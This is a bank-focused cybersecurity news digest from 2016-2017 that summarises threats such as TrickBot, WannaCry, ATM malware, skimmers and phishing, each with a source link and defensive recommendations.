Bancsec Advisor


WannaCry Inspires Banking Trojan to Add Self-Spreading Ability

(August 2, 2017)

Researchers have discovered a new version of the credential stealing TrickBot banking Trojan that has worm-like capabilities similar to that of WannaCry and NotPetya. This Trojan, which is initially spread via email attachments, can now use the Windows Server Message Block (SMB) to spread locally across networks and fool users into entering their banking credentials on fake login pages. To protect against this threat, security patches should be applied promptly and users should always follow safe web browsing practices, which includes the handling of email attachments and links.

Relevant URL(s): https://thehackernews.com/2017/08/trickbot-banking-trojan.html


White House Advisers Warn of CNI Cyber-9/11

(August 23, 2017)

The National Infrastructure Advisory Council (NIAC) recently released a report that warns of an imminent 9/11-style attack on critical national infrastructure (CNI). They state that although the private sector and the government have appropriate capabilities and resources to defend against such an attack, they are not properly organized or focused. Several of their recommendations include establishing separate, secure networks for CNI, best-in-class assessment practices and scanning tools, and proactive sharing of threat intelligence to name a few.

Relevant URL(s): https://www.infosecurity-magazine.com/news/white-house-advisers-warn-of-cni/


Phish Bait: DMARC Adoption Failures Leave Companies Exposed

(August 23, 2017)

DNS records were recently analyzed by researchers at Agari to identify Domain-based Message Authentication, Report & Conformance (DMARC) adoption and policies across top companies. DMARC is a technology designed to verify if an email is from the domain it claims to be from. They found that due to a lack of full implementation of DMARC, more than 90% of Fortune 500 companies are leaving customers, business partners, and brand names at risk. Banks should work to fully implement DMARC to mitigate phishing and other domain impersonation-style attacks.

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/phish-bait-dmarc-adoption-failures-leave-companies-exposed/d/d-id/1329702


Dumping Data from Deep-Insert Skimmers

(August 22, 2017)

KrebsOnSecurity was contacted by a police detective to help identify some strange devices found on two men caught maxing out stolen credit cards. These devices appear to allow thieves to retrieve card data from deep-insert skimmers without having to remove them. Deep-insert skimmers are placed within the card reader transport, completely hidden from view at the front of the ATM. Consumers should avoid standalone ATMs in low-lit areas, and stick to those that are physically installed at the bank when possible. It is also recommended to cover the number pad when entering your PIN.

Relevant URL(s): https://krebsonsecurity.com/2017/08/dumping-data-from-deep-insert-skimmers/


Ukraine Central Bank Detects Massive Attack Preparation

(August 21, 2017)

The National Bank of Ukraine has warned of a new attack targeting financial services firms that may be a precursor to another attack of NotPetya proportions. Upon initial distribution, it was not detected by standard anti-virus solutions. Although Ukraine may be the target of this new attack, as with NotPetya, it could spread to organizations in other countries. Application whitelisting and adaptive anti-malware can be integrated into cybersecurity programs to better protect endpoints from threats such as this.

Relevant URL(s): https://www.bankinfosecurity.com/ukraine-central-bank-detects-massive-attack-preparation-a-10209


US Banks Targeted with Trickbot Trojan

(July 20, 2017)

Trickbot, which specifically threatens financial organizations, is now targeting customers in the US. Until recently, this banking Trojan was only used to hit organizations abroad. Account takeover and fraud are the main goals of Trickbot. Other menacing banking Trojans are also being delivered through the Emotet loader. Both of these threats are being spread through spam campaigns and social engineering techniques. Multiple layers of security, such as social engineering and phishing training, adaptive endpoint protection, and continuous monitoring of network activity can help protect against threats such as these.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/us-banks-targeted-with-trickbot-trojan/d/d-id/1329417


One of the Biggest Ethereum and Bitcoin Exchanges Got Hacked

(July 5, 2017)

One of the largest Ethereum and Bitcoin cryptocurrency exchanges, Bithumb, was the recent victim of a data breach. Names, mobile phone numbers, and email addresses of more than 31,800 customers were stolen from the personal computer of a Bithumb employee. These customers are now being targeted in an effort to drain their digital currency wallets. Banks can avoid similar breaches by implementing an effective data loss prevention solution and prohibiting employees from storing sensitive information on personal devices.


Relevant URL(s): http://fortune.com/2017/07/05/bitcoin-ethereum-bithumb-hack/


Swiss Users Targeted with Windows, macOS Banking Trojan

(July 11, 2017)

Swiss users of both macOS and Windows have been the recent target of banking malware. The malware, which is delivered via phishing emails, contains two attached files to ensure the target is infected whether they use macOS or Windows. Both pieces of malware work in a similar fashion, so that the users’ traffic is intercepted and redirected to a spoofed version of their banking login page. Sophisticated endpoint protection or application whitelisting can be used to thwart these types of malware.

Relevant URL(s): https://www.helpnetsecurity.com/2017/07/11/swiss-users-macos-banking-trojan/


Critical Flaw Found in Windows NTLM Security Protocol

(July 11, 2017)

Researchers recently discovered two zero-day vulnerabilities in Windows NT LAN Manager (NTLM) security protocol that allow attackers to create new domain administrator accounts. NTLM, an older authentication protocol still supported by Microsoft, was replaced by Kerberos but continues to be widely used. As part of their patching cycle in July, Microsoft released a security patch for NTLM to address the issue. Servers with NTLM enabled should be patched as soon as possible, and NTLM traffic should be restricted on bank networks.

Relevant URL(s): http://thehackernews.com/2017/07/windows-ntlm-security-flaw.html


Critical RCE Vulnerability Found in Cisco WebEx Extensions, Again

(July 17, 2017)

A critical vulnerability was recently identified in Cisco Systems’ WebEx browser extension for Chrome and Fireox, which allows attackers to remotely execute malicious code on the victim’s computer. All that is required for successful exploitation is tricking the victim into visiting a web page that contains malicious code, which executes with the privileges of the affected browser. Cisco WebEx browser extensions for Chrome and Firefox should be updated to the latest version as soon as possible, and users should always use restricted Windows accounts.

Relevant URL(s): http://thehackernews.com/2017/07/cisco-webex-vulnerability.html


Cyberattack Hits Ukraine Then Spreads Internationally

(June 27, 2017)

What started as an apparent attack on Ukrainian government and business systems in late June ended up crippling tens of thousands of machines worldwide. This outbreak was the most recent in a series of attacks that utilized hacking tools, such as EternalBlue, stolen from the National Security Agency. This malware was dubbed NotPetya because it masquerades as the older ransomware, Petya. Similar to WannaCry, banks can limit their exposure to this type of attack by ensuring machines are patched promptly and all unnecessary services are disabled.

Relevant URL(s): https://www.nytimes.com/2017/06/27/technology/ransomware-hackers.html


Kaspersky: Online Banking Hacks Cost Banks Nearly $1.8M Each

(June 19, 2017)

According to a new report from Kaspersky Lab, cybersecurity incidents involving online banking services cost banks an average of almost $1.8 million each. Many of these incidents also come with additional costs, such reputation damage, data loss, or leaks of confidential information. In addition, when a bank falls victim to distributed denial of service (DDoS) attacks, customers can lose trust in that bank. Since banks are such lucrative targets, they need to go the extra mile to protect themselves against cyberattacks.

Relevant URL(s): http://www.ciodive.com/news/kaspersky-online-banking-hacks-cost-banks-nearly-18m-each/445248/


Most Organizations Believe Their Mainframe is More Secure Than Other Systems

(June 7, 2017)

A recent survey shows that 78 percent of organizations believe their mainframe is more secure than other systems, while 84 percent say they have “blind spots” regarding what mainframe data is accessed and how it’s used. Organizations face the risk that mainframe data may be misused by employees or others that gain unauthorized access to the system. Banks should collect, manage, and analyze mainframe audit logs to limit risk.

Relevant URL(s): https://www.helpnetsecurity.com/2017/06/07/mainframe-secure/


HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

(June 13, 2017)

Cyber actors of the North Korean government have been using a malware variant known as DeltaCharlie to target the media, financial, aerospace and other critical infrastructure sectors of the United States. These cyber actors, referred to as HIDDEN COBRA, have leveraged their capabilities to target and compromise victims for many years. Tools used by HIDDEN COBRA include DDoS botnets, remote access tools (RATs), keyloggers, and wiper malware. Mitigation strategies to defend against their common attacks include application whitelisting, up-to-date operating systems and third-party software, restrictive privileges, and network segmentation.

Relevant URL(s): https://www.us-cert.gov/ncas/alerts/TA17-164A


Poor Endpoint Security Can Cost You Millions in Detection, Response, and Wasted Time

(June 13, 2017)

A new study reveals that many companies are not efficiently protecting their sensitive data, and organizations are wasting an average of $6 million on the time to detect and contain insecure endpoints. The study also reveals that organizations are finding it difficult to identify rogue, off-network, or out-of-compliance devices, increasing their attack surface. To better protect endpoints, banks can leverage adaptive anti-malware and application whitelisting.

Relevant URL(s): https://www.helpnetsecurity.com/2017/06/13/poor-endpoint-security/


Massive Cyberattack Targeting 99 Countries Causes Sweeping Havoc

(May 13, 2017)

One of the most widespread and damaging cyberattacks in history was seen earlier in May, affecting major companies, hospitals, and government officials in at least 99 countries. The ransomware, dubbed WannaCry, which locked down all files on infected computers until payment was made, also included worm-like features that allowed it to spread to other computers on the network. The exploit took advantage of a vulnerability on Windows systems that the vendor had previously released a patch for. Banks can limit their exposure to this and similar attacks by ensuring machines are patched promptly and all unnecessary services are disabled.

Relevant URL(s): http://money.cnn.com/2017/05/12/technology/ransomware-attack-nsa-microsoft/index.html


Bank Account Hackers Used SS7 to Intercept Security Codes

(May 5, 2017)

Online banking customers were recently targeted by a two-stage attack designed to siphon money from their accounts. The assault included a phishing email, which tricked victims into visiting a phony bank website where they were asked to enter login information and their registered mobile phone number. Next, the fraudsters abused the SS7 protocol to forward all calls and SMS messages to an attacker-controlled number so that authentication codes could be intercepted, allowing them to complete fund transfers. The use of separate, hardware-based forms of multi-factor authentication can be utilized to help bank’s protect against attacks such as this.

Relevant URL(s): http://www.bankinfosecurity.com/bank-account-hackers-used-ss7-to-intercept-security-codes-a-9893


Google Docs Phishing Attack Abuses Legitimate Third-Party Sharing

(May 3, 2017)

Users of Google services were the recent target of an extremely convincing phishing campaign that abused Google Docs’ third-party sharing mechanism. Targets received messages, often from senders they knew, that appeared to be a shared document. Links within these messages led to a page requesting access to the user's Gmail account, which if granted would give the attackers full access to the victim's mailbox, and allowed the same message to be sent to all of that user’s contacts. Google has implemented a fix for this particular issue, but emails that looks suspicious in any way should always be treated with extreme caution.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/google-docs-phishing-attack-abuses-legitimate-third-party-sharing-/d/d-id/1328797


FBI: Business- and Email Account Compromise Attack Losses Hit $5 Billion

(May 5, 2017)

The FBI’s Internet Crime Complaint Center (IC3) recently reported a 2,370% increase in losses related to business email compromise (BEC) and email account compromise (EAC) between January 2015 and December 2016. These attacks, which are typically carried out after careful study of the victim and social engineering, have reportedly caused $5.3 billion in loss for global and domestic companies over a three-year period. Significant transactions should always require a dual-approval process and verbal verification with the requester, even when appearing to come from a trusted source.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/fbi-business--and-email-account-compromise-attack-losses-hit-$5-billion/d/d-id/1328812


Blackmoon Banking Trojan Goes Modular

(May 5, 2017)

The Blackmoon banking Trojan, utilizing a new framework to evade detection, has recently been seen targeting users in South Korea. The new framework uses three separate downloader pieces that execute separate components in a tightly coupled sequence, and work together to install the malware. Blackmoon is typically distributed through malicious sites and online advertisements. This unique design makes it easier for the authors to target users in other countries as well. Due to the evasive behavior of this malware, sophisticated endpoint protection or application whitelisting can be used to thwart its execution.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/blackmoon-banking-trojan-goes-modular-/d/d-id/1328814


Banks Must Focus More on Cyber-Risk

(April 5, 2017)

Online financial transactions have become essential to everyday life, and banks are under increasing threats from cyberattacks. A short time ago, the Federal Reserve, FDIC, and OCC released Enhanced Cyber Risk Security Standards. This guidance for midsize and large banks is designed to increase their focus on cyberattack resilience and cyber-risk mitigation.

Relevant URL(s): http://www.darkreading.com/endpoint/banks-must-focus-more-on-cyber-risk/a/d-id/1328566


Cybercriminals Seized Control of Brazilian Bank for 5 Hours

(April 4, 2017)

In October of 2016, cybercriminals compromised 36 domains belonging to a Brazilian bank for a five hour period. This allowed the attackers to intercept all of the bank’s online and mobile banking, point-of-sale, and investment transactions. Experts estimate that possibly millions of the bank’s customers across the globe, including the US, were also victimized with malware designed to harvest their data. This attack was possible, after administrative access to the bank’s DNS account was obtained. Implementing multi-factor authentication on critical systems such as DNS management can help thwart attacks such as this.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/cybercriminals-seized-control-of-brazilian-bank-for-5-hours/d/d-id/1328549


Health Savings Account Fraud: The Rapidly Growing Threat

(April 14, 2017)

Health savings account (HSA) fraud, a serious threat with ties to healthcare breaches, has been increasing in frequency since 2016. Victims’ “fullz”, or full listing of personally identifiable information (PII) obtained from compromised healthcare institutions, are being used by malicious actors to gain illicit access to funds, transfer money from the accounts, and even transfer funds to prepaid cards opened in the victim’s name. Preventing this type of fraud can be difficult, but monitoring account balances and activity closely and reporting potential indicators of compromise can reduce the extent of the damages.


Relevant URL(s): http://www.darkreading.com/endpoint/health-savings-account-fraud-the-rapidly-growing-threat/a/d-id/1328633


Mobile Payment Card Cloning: Understanding the Risks

(April 12, 2017)

The use of mobile contactless payments has been growing quickly, as well as Host Card Emulation (HCE), or emulating payment cards on a mobile device. An IT Security Consultant with SecuRing has recently revealed that it’s possible to copy mobile contactless card data to another device, allowing an attacker to use it for payment transactions. Banks deploying HCE technology in their mobile payment applications should test against card cloning attacks and be sure server side fraud detection is in place.

Relevant URL(s): https://www.helpnetsecurity.com/2017/04/12/mobile-payment-card-cloning/


ATMitch: Remote Administration of ATMs

(April 4, 2017)

Investigation into several recent fileless attacks led researchers to the discovery of new ATM malware, dubbed ATMitch. This malware, which can empty an ATM of its cash before removing itself, is installed on ATMs via Remote Desktop Connection (RDP) access from within the bank. ATMitch works on all ATMs that support the XFS library, which allegedly is the vast majority. Application whitelisting should be utilized on ATMs to help prevent this and other types of malware.

Relevant URL(s): https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/


Banking Agencies Issue Joint Report to Congress

(March 21, 2017)

Members of the FFIEC issued a joint report to Congress regarding their review of rules affecting financial institutions. The Economic Growth and Regulatory Paperwork Reduction Act (EGRPRA) requires the federal banking agencies and FFIEC to conduct reviews of their rules at least every 10 years in order to identify outdated and unnecessary regulations. The banking agencies published requests for written comment and received over 250 comment letters. The report describes several joint actions taken or planned by the regulators.

Relevant URL(s): https://www.ffiec.gov/press/pr032117.htm


NY Breach Report Highlights Third-Party Risk

(March 29, 2017)

In 2016, New York had one of the highest data exposure rates in the state's history, with the annual number of reported security breaches increasing by 60%. 81 percent of the 1,300 reported breaches involved the loss of Social Security numbers or financial information. As banks consider their security controls, they also need to think about ensuring their third-party service provider's controls meet their requirements and expectations.

Relevant URL(s): http://www.csoonline.com/article/3185908/security/expert-ny-breach-report-highlights-third-party-risk.html


Over One Million Fraud Attacks on Financial Firms in 2016

(March 1, 2017)

After more than one million financial firms were targeted in 2016 by scammers trying to capitalize on anti-fraud gaps, experts warn that this year may be worse. ThreatMetrix, which recently released its Q4 2016 Cybercrime Report, blocked more than 80 million attacks using stolen or fake credentials during 2016 in the financial sector. They also claim the number of attacks jumped 150% from Q3 to Q4 in 2016. Although preventing this type of fraud can be difficult, analytics can be used by banks to help identify and mitigate the risk.

Relevant URL(s): https://www.infosecurity-magazine.com/news/over-one-million-fraud-attacks/


Dridex Trojan Gets AtomBombing Update

(March 1, 2017)

One of the most destructive banking Trojans, Dridex, has recently been updated with new features. The malware is now equipped with a new sophisticated injection technique, known as AtomBombing, which allows it to propagate and infect endpoints under the radar. This update shows how attackers keep up to date on new technologies. In order to protect endpoints, banks can incorporate products such as adaptive anti-malware and application whitelisting into their security programs.

Relevant URL(s): https://www.infosecurity-magazine.com/news/dridex-trojan-gets-atombombing


Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan

(March 22, 2017)

Researchers have discovered that Chinese criminals are using fake base transceiver stations (BTS) to carry out SMiShing attacks, or phishing messages sent via SMS. The malware being distributed is targeting Android users' banking credentials and can bypass two-factor authentication. Researchers have warned that although this threat has only been seen in China so far, it could quickly spread worldwide. As always, users should keep their mobile devices updated to the latest version and avoid installing apps from third-party app stores.

Relevant URL(s): http://thehackernews.com/2017/03/rogue-bts-android-malware.html


Banks Around the World Targeted in Watering Hole Attacks

(February 14, 2017)

Polish banks were recently the victim of malware that was inadvertently distributed to them by their own financial regulator, the Polish Financial Supervision Authority (KNF). As affected banks shared indicators of compromise, other banks around the globe found that they had been hit as well. The majority of affected institutions are banks in the US, Poland, Mexico, UK, and Chile. Banks should update their defense systems with the indicators of compromise provided by BAE and Symantec to help identify and block this attack.

Relevant URL(s): https://www.helpnetsecurity.com/2017/02/14/banks-watering-hole-attacks/


Fast Food Chain Arby’s Acknowledges Breach

(February 17, 2017)

A spokesman for Arby's confirmed rumors that they had recently remediated a breach that affected hundreds of their restaurant locations nationwide. The breach, which is estimated to have occurred between October 25, 2016, and January 19, 2017, involved malicious software installed on payment card systems at the restaurants. Consumers should always remember to watch their card statements closely and report suspicious or unauthorized transactions.

Relevant URL(s): https://krebsonsecurity.com/2017/02/fast-food-chain-arbys-acknowledges-breach/


A Rash of Invisible, Fileless Malware is Infecting Banks Around the Globe

(February 8, 2017)

Fileless malware is going mainstream. Researchers at Kaspersky Lab have discovered that at least 140 bank and other enterprise networks have been infected by malware that resides solely in the memory of the compromised computers. They claim the infections are difficult to detect, partially due to the use of legitimate administrative and security tools, such as PowerShell, Metasploit, and Mimikatz. Banks can help protect systems by ensuring PowerShell is disabled throughout the organization and network segregation is properly implemented.

Relevant URL(s): https://arstechnica.com/security/2017/02/a-rash-of-invisible-fileless-malware-is-infecting-banks-around-the-globe/


Zeus-Derived Flokibot Malware Invades PoS

(January 31, 2017)

Ever since the source code for Zeus leaked in 2011 via underground forums, malicious actors have continued to refine the banking Trojan to help them steal banking credentials and infect point-of-sale (POS) devices. The latest example, Flokibot, includes a redesigned stealth dropper that is used to install other malicious code and is designed to evade anti-virus scans. The malware captures payment card numbers, as well as the encrypted PINs. Monitoring POS systems for data exfiltration and unusual network connections can help block this attack vector.

Relevant URL(s): http://www.bankinfosecurity.com/blogs/zeus-derived-malware-continues-to-pwn-pos-devices-p-2384


Infected Weather App's Forecast: Malware

(February 22, 2017)

A legitimate Android app, Good Weather, was recently discovered to contain a Trojan capable of delivering banking malware. The malware is capable of accessing the victim's banking credentials and can bypass some two-factor authentication. Android users should carefully review the permissions that apps request and mobile antivirus software should be used.

Relevant URL(s): https://www.scmagazine.com/infected-weather-apps-forecast-malware/article/639512/


ABA Endorses Anti-Phishing and Brand Protection Solution by Easy Solutions

(February 7, 2017)

The digital threat protection suite, Easy Solution, has been endorsed by the American Bankers Association through its subsidiary the Corporation for American Banking. The endorsement comes after ABA's extensive due diligence, oversight from ABA's Endorsed Solutions' Banker Advisory Council, and research support by the cybersecurity company Bancsec. The suite, which includes anti-phishing monitoring and brand protection services, is now the solution of choice to ABA members.


Relevant URL(s): http://www.aba.com/Press/Pages/020717EasySolutionsEndorsement.aspx


Stolen Passwords Fuel Cardless ATM Fraud

(January 17, 2017)

"Cardless ATM" transactions, a new offering from several financial institutions that allows customers to take out cash with their mobile phones, is opening up new opportunities for thieves. With this new technology, customers can enter an amount they'd like to withdraw into the mobile banking app, then use a numeric code at the ATM or present a QR code to complete the transaction. As reported by krebsonsecurity.com, criminals are already leveraging stolen customer online banking credentials to exploit this new service. If banks are looking to offer this new feature, behavioral analytics, low withdrawal limits, and new customer and mobile device validation can help identify and mitigate risks.

Relevant URL(s): https://krebsonsecurity.com/2017/01/stolen-passwords-fuel-cardless-atm-fraud/


Carbanak's Back And Using Google Services For Command-and-Control

(January 17, 2017)

The Carbanak group responsible for stealing $1 billion from banks in 2015 has resurfaced with a new approach, using Google services to command-and-control its malware. The use of a trusted third party service allows the attackers to hide in plain site. The malware is typically distributed via phishing emails, which can often be identified by employees that regularly receive adaptive information security awareness training and testing.

Relevant URL(s): http://www.darkreading.com/cloud/carbanaks-back-and-using-google-services-for-command-and-control/d/d-id/1327909


ATM Malware Retooled to Strike More Machines

(January 16, 2017)

FireEye Labs recently identified a previously unseen version of Ploutus, one of the most advanced ATM malware families first discovered in 2013. This new version, dubbed Ploutus-D, interacts with KAL's Kalignite ATM platform that runs on 40 different ATM vendors. If a criminal were to gain access to the ATM internals, thousands of dollars could be dispensed in minutes. Banks with ATMs running KAL's Kalignite can take advantage of its built in security features, such as application whitelisting, disabled USB ports, and BitLocker full-disk encryption.

Relevant URL(s): http://www.bankinfosecurity.com/blogs/latin-american-atm-malware-set-to-strike-more-machines-p-2361


Bank Leaks 60,000 Account Details in Three Character Email Slip-up

(January 9, 2017)

One of Australia's largest banks recently sent an email containing data on 60,000 bank accounts to an unknown external recipient by accident. The problem stems from the fact that the bank owns the nab.com.au domain, but not the nab.com domain. The data was erroneously sent to an email account at the nab.com domain. It's likely that no harm was done; however, the bank nor its customers can be certain. A data loss prevention and email encryption solution can help banks ensure a similar mistake doesn't catch them off guard.

Relevant URL(s): https://nakedsecurity.sophos.com/2017/01/09/bank-leaks-60000-account-details-in-three-character-email-slip-up/



Source Code for Another Android Banking Malware Leaked

(January 22, 2017)

Source code for Android banking malware, as well as instructions for its use, have been leaked online and researchers with Dr. Web have already identified it in the wild. The new Trojan, BankBot, has the ability to intercept SMS messages, show phishing dialogs, steal sensitive information and credentials, as well as payment card details. Users can protect themselves by disabling the installation of unofficial apps in their phone settings, and avoiding attachments and links from suspicious sources.

Relevant URL(s): http://thehackernews.com/2017/01/android-banking-malware.html


Hacks at Russian Central Bank Have Cost 2 Billion Rubles

(December 3, 2016)

During 2016, malicious actors tried to nab 5 billion rubles from Russia's central bank. The central banking authority managed to redirect some of the funds but attackers still made off with 2 billion rubles, the equivalent of $31 million. Although it's unclear who is responsible for this attack, it bears some resemblance to a string of heists that gained access to SWIFT, the Society for Worldwide Interbank Financial Telecommunication. Banks should review every aspect of their information security program, including controls around their e-banking channels.

Relevant URL(s): http://money.cnn.com/2016/12/02/technology/russia-central-bank-hack/index.html


Ransomware as a Service Fuels Explosive Growth

(December 5, 2016)

Although ransomware attacks don't get much publicity, a white paper from Osterman Research indicates that nearly 50 percent of US companies fell victim to these attacks during the past year. Another report by Trend Micro found there was an increase of 172 percent of new ransomware families in the first half of 2016. Even more alarming, malware authors have a new Ransomware as a Service (RaaS) business model, where they enlist distributors to spread the software, with some packages costing as little as $100. Protection against this threat can be difficult, but knowing what to expect, and having layered security systems and a robust ransomware response plan in place can greatly help limit exposure.

Relevant URL(s): http://www.csoonline.com/article/3146537/security/ransomware-as-a-service-fuels-explosive-growth.html


InPage Zero Day Used in Attacks Against Banks

(November 23, 2016)

Researchers at Kaspersky Lab have identified a zero-day vulnerability in Inpage publishing software. Several attacks attempting to exploit it against banks have been recorded, as well as a few against government agencies. The exploit, which is delivered via phishing campaigns, can often be prevented with consistent staff education and testing, as well as strong email threat protection systems.

Relevant URL(s): https://threatpost.com/inpage-zero-day-used-in-attacks-against-banks/122112/


'Alice' Malware Loots ATMs

(December 21, 2016)

A new bare-bones ATM malware family, dubbed 'Alice', has recently been discovered by Trend Micro. Alice has one simple function, empty the ATM of its cash. All a criminal would need to infect a system is access to the ATM's internals to install and interact with the malware. In this case, physical ATM security and persistent monitoring can help defend against the threat.

Relevant URL(s): http://www.darkreading.com/vulnerabilities---threats/alice-malware-loots-atms/d/d-id/1327773


'Frighteningly Easy' Hack Guesses Full Credit Card Details In 6 Seconds

(December 2, 2016)

Researchers at Newcastle University have developed an extremely easy way to guess the card number, expiration date, and security code of any Visa credit or debit card in six seconds flat. The attack, named 'Distributed Guess Attack', exploits the lack of a mechanism to detect multiple invalid payment requests made from different online merchant sites. This allows an unlimited number of cracks at predicting payment information by distributing the guesses across multiple sites. The researchers believe this may be the tactic used in stealing $3 million from Tesco Bank customers recently. To mitigate this threat, banks can implement back-end analytics to help identify fraud.

Relevant URL(s): http://www.darkreading.com/vulnerabilities---threats/frighteningly-easy-hack-guesses-full-credit-card-details-in-6-seconds/d/d-id/1327632


Tesco Bank Hacked

(November 7, 2016)

Over $3 million was recently stolen from 9,000 customers of UK based Tesco Bank. The bank did not disclose how accounts had been compromised or any other details of the attack. Tesco Bank announced that they're working with authorities and regulators to address the breach. This is one instance where having a well thought out incident response plan can help greatly.

Relevant URL(s): http://thehackernews.com/2016/11/tesco-bank-hack.html


OCC Discloses Data Breach

(October 28, 2016)

As required by the Federal Information Security Modernization Act (FISMA), the OCC notified Congress and other federal agencies of a major information security incident several weeks ago. The incident involves a former employee that downloaded over 10,000 records that contained controlled, unclassified information onto removable drives that are now missing. The OCC claims that policies and technical safeguards have been implemented to prevent such an event from occurring in the future.

Relevant URL(s): https://www.occ.gov/news-issuances/news-releases/2016/nr-occ-2016-138.html


Fake Executive Social Media Accounts Threaten Enterprises

(November 16, 2016)

Research conducted by BrandProtect revealed that 19 percent of Fortune 500 CEO Twitter profiles, and 9 percent of LinkedIn accounts reviewed were represented by numerous duplicate accounts, which raises concerns about potential security vulnerabilities. These types of fake profiles are often used in spear phishing or whaling attacks, or to push malware and ransomware into enterprises. Banks can better protect themselves as well as their customers with the use of brand protection services.

Relevant URL(s): https://www.helpnetsecurity.com/2016/11/16/fake-executive-social-media-accounts/


Android Trojan Targets Customers of 94 Banks in US, Europe

(November 2, 2016)

A malicious Android app masquerading as Flash Player is targeting online banking credentials as well as payment card details. The app is purportedly focusing on banks in the US, Australia, Germany, and France. Users should avoid installing unofficial apps on their devices and app reviews and sources should be checked before installation.

Relevant URL(s): https://www.helpnetsecurity.com/2016/11/02/trojan-flash-player-android-app/


TrickBot Banking Trojan is the Next Big Threat

(November 9, 2016)

Personal and business bank accounts are being aggressively targeted by a new banking Trojan named TrickBot. Researchers believe TrickBot may have been built by part of the team that built the nefarious banking Trojan Dyre. As they see it, this Trojan is likely to become a major threat. Third-party software and operating system patches should be kept current and users should always follow safe web browsing practices, which includes the handling of email attachments and links.

Relevant URL(s): https://www.helpnetsecurity.com/2016/11/09/trickbot-banking-trojan/


Hackers Changing Tactics, Techniques, and Procedures

(October 24, 2016)

An NTT Security report reveals the financial industry has seen a significant increase in the sophistication and type of attacks in this most recent quarter. They identify finance as the most attacked industry, with 23 percent of all attacks, and 43 percent of these were web application attacks. Comprehensive penetration testing can help banks understand where and how these attacks could take place so that appropriate security solutions can be implemented.

Relevant URL(s): https://www.helpnetsecurity.com/2016/10/24/hackers-changing-tactics/


Ransomware Raises The Bar Again

(October 10, 2016)

Ransomware is now the top attack vector targeting financial organizations according to a recent survey by SANS. 55 percent of financial firms identify ransomware as the most prevalent attack, with some loss claims between $100,000 and $500,000. Banks should have ransomware response plans in place, along with offline backups, layered security systems, and end-user awareness to limit ransomware exposure.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/ransomware-raises-the-bar-again-/d/d-id/1327138


88% of Employees Lack Awareness to Stop Privacy or Security Incidents

(October 27, 2016)

A survey was recently conducted to test employees' cybersecurity awareness. The study revealed that 88 percent lacked sufficient awareness to stop preventable incidents. Other key findings cite that 16 percent of employees exhibit behaviors that put organizations at serious security risk and 25 percent failed to recognize sample phishing emails. Banks should ensure employees receive adaptive information security awareness training at regular intervals.

Relevant URL(s): https://www.helpnetsecurity.com/2016/10/27/employees-lack-awareness/


Attackers 'Hack' ATM Security with Explosives

(October 17, 2016)

Europe has seen a surge in attacks on ATMs, many using explosives to steal cash from the safes. In the first half of this year, police in Europe cataloged 492 of these attacks. On average, explosive attacks have netted criminals $18,300 each. Although these attacks have not yet made it to the United States, banks should have strong physical security in place at all ATM locations and they should be inspected regularly for tampering.

Relevant URL(s): http://www.bankinfosecurity.com/attackers-hack-atm-security-explosives-a-9457


Russian Criminals' Bank Attacks Go Global

(October 26, 2016)

Russian criminals have tested and perfected their techniques on local banks and are now taking them global. As stated by Moscow-based Group-IB, these criminals developed their attacks for the market they know best, then later go after banks in the U.S., Canada, and other countries. They also claim that another wave of attacks is building up in Russia, mobile banking Trojans, which have escalated 471 percent recently. U.S. based banks would be wise to stay abreast of international cyberattacks to help improve their security strategies.

Relevant URL(s): www.csoonline.com/article/3135364/security/russian-criminals-bank-attacks-go-global.html


FFIEC Rewrites the Information Security IT Examination Handbook

(September 27, 2016)

The FFIEC has recently updated their guidance for managing financial institutions' information systems, which is the first update in over 10 years. The updated handbook is almost 40% shorter; however, the expectations have increased. A more traditional approach to risk management is contained in the guidance, as well as an increased focus on cybersecurity controls, internal assessments, and third-party service providers.

Relevant URL(s): http://complianceguru.com/2016/09/ffiec-rewrites-it-handbook/


FDIC Updates IT Examination Procedures

(June 30, 2016)

FDIC-supervised institutions will be subject to new IT examination procedures starting immediately. This major overhaul, now dubbed InTREx (Information Technology Risk Examination), is the first considerable update since 2007. The new design has a simpler pre-examination phase but institutions should prepare for a more thorough examination phase. The new granular procedures require examiners to review and evaluate your documentation and determine if it sufficiently proves that you're doing what you say you'll do. Having necessary documentation available may make all the difference.

Relevant URL(s): https://www.fdic.gov/news/news/financial/2016/fil16043.html


SWIFT Sees New Hack Attacks Against Banks

(August 31, 2016)

Since the theft of $81 million from the central bank of Bangladesh's account at the Federal Reserve Bank of New York, SWIFT has seen continued attacks against banks' local security controls to send fraudulent messages via the SWIFT network. In a private letter from SWIFT to its customers, the collective warns that some banks have lost money as a result. The letter also explains that targets have varied in size and geography, and have used diverse connectivity methods; however, they've all had weaknesses in their local security. Banks are urged to install the updated SWIFT software, which includes stronger password management rules, better user authentication, and better tools for detecting attacks.

Relevant URL(s): http://www.bankinfosecurity.com/swift-sees-new-hack-attacks-against-banks-a-9374


Secret Service Warns of ‘Periscope’ Skimmers

(September 16, 2016)

According to an alert by a financial task force, a new type of skimming technology known as "periscope skimming" has been found in at least two ATMs in Connecticut and Pennsylvania. This new skimmer connects directly to the ATM's internal circuitry to steal payment card information and can store up to 32,000 card numbers. In both of these cases the criminals installed the devices by gaining access to the insides of the ATMs with a key. ATMs should be physically secured, not exposed at the top if possible, and checked regularly for evidence of tampering.

Relevant URL(s): http://krebsonsecurity.com/2016/09/secret-service-warns-of-periscope-skimmers/


Banking Trojan GozNym Botnet Sinkholed After Infecting Over 23,000 Victims in UK, US and Europe

(September 29, 2016)

Researchers with Cisco Talos were able to successfully bring down a very large botnets controlled by GozNym operators. GozNym, a powerful banking Trojan, is a combination of features from two families of malware, Gozi and Nymaim. The Trojan was found to have infected at least 23,000 victims in the US, the UK, and Europe. These types of threats, which are typically delivered via spear phishing, can often be mitigated with education campaigns, consistent social engineering testing of staff, and email security filtering.

Relevant URL(s): http://www.ibtimes.co.uk/banking-trojan-goznym-botnet-sinkholed-after-infecting-over-23000-victims-uk-us-europe-1583973



Contents

  1. 1 WannaCry Inspires Banking Trojan to Add Self-Spreading Ability
  2. 2 White House Advisers Warn of CNI Cyber-9/11
  3. 3 Phish Bait: DMARC Adoption Failures Leave Companies Exposed
  4. 4 Dumping Data from Deep-Insert Skimmers
